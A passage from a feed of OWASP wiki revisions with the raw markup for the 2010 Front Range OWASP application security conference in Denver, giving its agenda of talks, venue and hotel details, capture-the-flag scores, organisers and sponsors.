| style=&amp;quot;width: 110px; font-size: 95%; color: rgb(0, 0, 0);&amp;quot; | &lt;br /&gt;
|} &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &amp;lt;hr&amp;gt;&lt;br /&gt;
&amp;lt;paypal&amp;gt;Denver&amp;lt;/paypal&amp;gt; --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&amp;diff=84418</id>
		<title>Front Range OWASP Conference 2010</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&amp;diff=84418"/>
				<updated>2010-06-03T21:59:10Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__NOTOC__ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://froc2010.eventbrite.com/ Registration is NOW OPEN] --&amp;gt;&lt;br /&gt;
FROC2010 was a major success!  If you attended the event, please complete the [http://www.surveymonkey.com/s/FROC2010 Speaker Evaluation Survey]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;!-- Header --&amp;gt;&lt;br /&gt;
====Welcome====  &lt;br /&gt;
[[Image:Froc2010_sm.png|200px]]&lt;br /&gt;
'''Welcome to FROC 2010, the third annual Front Range OWASP Application Security Conference!'''&lt;br /&gt;
&lt;br /&gt;
After successful FROC's in June of 2008, and [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 March of 2009], we are back in Denver, Colorado USA on Wednesday the 2nd of June 2010! &lt;br /&gt;
&lt;br /&gt;
This year we again present a full day, multi-track event, which will provide valuable information for managers and executives as well as developers and engineers.&lt;br /&gt;
&lt;br /&gt;
In 2009, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2010.  This year we are organizing the conference with the support of our colleagues at the [http://www.cloudsecurityalliance.org/ Cloud Security Alliance], and will feature an AppSec track as well as a CloudSec/VirtSec track.&lt;br /&gt;
&lt;br /&gt;
====Registration====&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://froc2010.eventbrite.com Registration is now open!] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, FROC was a free event in 2008 and 2009.  This year, thanks to the generosity of our [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2010#tab=Conference_Sponsors sponsors] we are offering tickets to the event on a DONATION basis.  Pay whatever you or your company can afford.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Click [http://froc2010.eventbrite.com HERE] to register now. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Agenda====&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 2 June 2010==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference multi track format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | June 2, 2010&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to FROC 2010 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:35 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[FROC2010_Abstract_Chess|&amp;quot;Watching Software Run: Software Security Beyond Defect Elimination&amp;quot;]]&lt;br /&gt;
''Brian Chess, Fortify Software''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/a/owasp.org/leaf?id=0B_-vbfka88vFNjMxYTcwY2ItNjgxNy00ZjMzLTkwMTUtN2IyMzA4MmE3OWVl&amp;amp;sort=name&amp;amp;layout=list&amp;amp;num=50 Presentation] [http://blip.tv/file/3710067 Video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=2875886330538461390 Video] --&amp;gt;&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:35-10:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP: State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board - [http://www.owasp.org/index.php/User:Brennan BIO]''&lt;br /&gt;
&lt;br /&gt;
[http://blip.tv/file/3710155 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:00-10:20 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Cloud Security Alliance: State of the Union&lt;br /&gt;
''Randy Barr, Cloud Security Alliance''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:20-10:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:22%; background:#BC857A&amp;quot; | '''AppSec/Technical Track: Room 1'''&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; | '''Cloud/Mobile/Emerging Track: Room 2'''&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; | '''Management / Exec Track: Room 3'''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Grossman|2010: Web Hacking Odyssey - The Top Hacks of the Year]]&amp;quot;&lt;br /&gt;
''Jeremiah Grossman''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFZTIwOWY3NjctZTY1OC00YTRjLThjNGUtMDIwZTk3MmVhN2Zi&amp;amp;hl=en Presentation] Video&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_McClellan|&amp;quot;Building a Secure, Compliant Cloud for the Enterprise&amp;quot;]]&lt;br /&gt;
''Matt Ferrari, Hosting.com''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Byrne|&amp;quot;Anatomy of a Logic Flaw&amp;quot;]]&lt;br /&gt;
''David Byrne and Charles Henderson, Trustwave''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Zusman|Advanced MITM Techniques for Security Testers]]&amp;quot;&lt;br /&gt;
''Mike Zusman, Raj Umadas and Aaron Rhodes, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Nickerson|&amp;quot;YOU are the weakest link&amp;quot;]]&lt;br /&gt;
''Chris Nickerson, Lares Consulting''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Whaley|&amp;quot;Effectively marketing security as a win for both the business and the customer&amp;quot;]]&lt;br /&gt;
''Ben Whaley, Applied Trust Engineering and Jeff Smith, Rally Software''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Wheeler|Vulnerabilities in Secure Code: Now and Beyond]]&amp;quot;&lt;br /&gt;
''Alex Wheeler and Ryan Smith, Accuvant''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Roberts|&amp;quot;Real life CSI – Data Mining and Intelligence Gathering for the masses&amp;quot;]]&lt;br /&gt;
''Chris Roberts, Cyopsis''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Dickson|&amp;quot;The Permanent Campaign: Driving a Secure Software Initiative in the Enterprise&amp;quot;]]&lt;br /&gt;
''John Dickson, Denim Group''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:40 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Byrne2|Beware of Serialized GUI Objects Bearing Data]]&amp;quot;&lt;br /&gt;
''David Byrne and Rohini Sulatycki, Trustwave''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Zusman2|&amp;quot;What's Old Is New Again: An Overview of Mobile Application Security&amp;quot;]]&lt;br /&gt;
''Zach Lanier and Mike Zusman, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Goldschmidt|&amp;quot;Fundamental Practices and Tools to implement a security development lifecycle&amp;quot;]]&lt;br /&gt;
''Cassio Goldschmidt, Symantec''&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:40-15:00 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | BREAK&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:22%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[FROC2010_Abstract_Schmidt|Solving Real-World Problems with an  Enterprise Security API]]&amp;quot;&lt;br /&gt;
''Chris Schmidt''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFNjM5NzZmODQtZTQ1OS00NTYxLWJmOWQtNzE3OWY4OWZkOGMw&amp;amp;hl=en Presentation] Video&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --&amp;gt;&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Tucker|&amp;quot;Cloudy with a chance of hack&amp;quot;]]&lt;br /&gt;
''Lars Ewe, Cenzic''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/present/edit?id=0Af-vbfka88vFZGRrcjYycXZfMjUyZDQ3enN6ZmI&amp;amp;hl=en Presentation]&lt;br /&gt;
&lt;br /&gt;
 | style=&amp;quot;width:22%; background:#C6E2FF&amp;quot; align=&amp;quot;left&amp;quot; | [[FROC2010_Abstract_Cornell|&amp;quot;Application Security Program Management with Vulnerability Manager&amp;quot;]]&lt;br /&gt;
''Bryan Beverly, Denim Group''&lt;br /&gt;
&lt;br /&gt;
[https://docs.google.com/fileview?id=0B_-vbfka88vFNTY3OGUwMGItMmQyMi00YWRmLWJkMzgtMTZhNDNlZjJiNWJm&amp;amp;hl=en Presentation]&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Panel Discussion: Topic TBD.  Moderator: John Dickson, Denim Group&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;3&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Wrap up, vendor raffles, CTF awards, FREE BEER!&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Logistics====&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will again be held at University of Colorado, Denver.  However, instead of the Tivoli Student Union, this year the event will be hosted at the North Classroom building (Atrium UCD).&lt;br /&gt;
&lt;br /&gt;
[[File:Froc map.GIF|thumb|left]]&lt;br /&gt;
&lt;br /&gt;
[http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;geocode=&amp;amp;q=1200+Larimer+Street,+Denver,+CO&amp;amp;sll=37.0625,-95.677068&amp;amp;sspn=37.188995,62.226563&amp;amp;ie=UTF8&amp;amp;hq=&amp;amp;hnear=1200+Larimer+St,+Denver,+Colorado+80204&amp;amp;z=16&amp;amp;iwloc=A Google Map of the Venue: 1200 Larimer St., Denver CO 80204]&lt;br /&gt;
&lt;br /&gt;
=====Accomodation=====&lt;br /&gt;
OWASP has negotiated discounted rates with the uber-pimpin [http://www.hotelteatro.com/ Hotel Teatro].  Rooms under the FROC rate are $159/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention FROC or use the [https://reservations.ihotelier.com/crs/g_reservation.cfm?groupID=464765&amp;amp;hotelID=14708 iHotelier.com link here].&lt;br /&gt;
&lt;br /&gt;
=====How to get to the venue?=====&lt;br /&gt;
&lt;br /&gt;
*By taxi: taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free&lt;br /&gt;
&lt;br /&gt;
*By car: there is plenty of parking at the UCD.  Attendees should park at the Tivoli lot (as in past years) and it is a short walk to the North Classroom buildings.  Parking validation will be provided for registered FROC participants.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
====Call for Presentations====&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2010_CFP|call for presentations]] closed 31 March 2010.  We are no longer accepting proposals for presentations.  If you have already submitted a presentation you can, however update your abstract or submit additional information to clarify your proposal. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
====Agenda and Presentations: 5 March 2009====&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;Top Ten Web Hacking Techniques of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=2875886330538461390 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-8396241750899139680 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Stads|&amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot;]] &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=1629208419122953007 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-2540122072368010669 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=3127205451740977427 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter The Stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson, Trustwave''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=7611144342490803641 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=129190988572738701 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=-4972597638535731442 Video]&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
&lt;br /&gt;
[http://video.google.com/videoplay?docid=8588268474844052248 Video]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Capture the Flag (CTF)====&lt;br /&gt;
&lt;br /&gt;
A capture the flag contest was held, with challenges in the categories of network, forensics, and web applications.   The winner received a new iPad.  Second and third place received an iPod shuffle.&lt;br /&gt;
&lt;br /&gt;
The team that won the contest consisted of four members of the Denver Defcon group, dc303 (http://dc303.org).  This group also plays in the annual Defcon CTF competition (with about 20 other folks from the Denver area).  If you are interested in joining them for future CTF competitions (local and abroad), contact mantis1 at gmail.com.&lt;br /&gt;
&lt;br /&gt;
Second place went to Matthew Rowley (playing on his own)&lt;br /&gt;
&lt;br /&gt;
Final scores:&lt;br /&gt;
{| border=&amp;quot;3&amp;quot;&lt;br /&gt;
|Rank||Name||Score||Comments&lt;br /&gt;
|-&lt;br /&gt;
|'''1'''||'''mantis'''||'''4500'''||&lt;br /&gt;
|-&lt;br /&gt;
|'''2'''||'''Mathew Rowley'''||'''2850'''||'''(wuntee)'''&lt;br /&gt;
|-&lt;br /&gt;
|'''3'''||'''jgimer'''||'''2300'''||&lt;br /&gt;
|-&lt;br /&gt;
|4||jsouza||2200||&lt;br /&gt;
|-&lt;br /&gt;
|5||CSURams||1800||&lt;br /&gt;
|-&lt;br /&gt;
|6||quincymagoo||1200||&lt;br /&gt;
|-&lt;br /&gt;
|7||skehoe||700||&lt;br /&gt;
|-&lt;br /&gt;
|8||jtevans||700||&lt;br /&gt;
|-&lt;br /&gt;
|9||igctf||700||&lt;br /&gt;
|-&lt;br /&gt;
|10||kdavis||700||&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Conference Committee====&lt;br /&gt;
&lt;br /&gt;
FROC 2010 Planning Committee Chair: Kathy Thaxton -  kthaxton at owasp dot org&lt;br /&gt;
&lt;br /&gt;
Presentation Selection Committee:&lt;br /&gt;
* Mark Bristow - OWASP Global Conference Committee&lt;br /&gt;
* David Campbell - OWASP Denver&lt;br /&gt;
* Eric Duprey - OWASP Denver&lt;br /&gt;
* Chris Hoff - Cloud Security Alliance&lt;br /&gt;
* Eoin Keary - Chair, OWASP Global Conference Committee&lt;br /&gt;
* Michael Sutton - Cloud Security Alliance&lt;br /&gt;
* Jim Reavis - Cloud Security Alliance&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell at owasp dot org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition POC: Kathy Thaxton - kthaxton at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Capture the Flag POC: Eric Duprey - eduprey at owasp dot org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Conference Sponsors====&lt;br /&gt;
&lt;br /&gt;
[[File:Sponsors.PNG]]&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
&amp;lt;!-- &lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
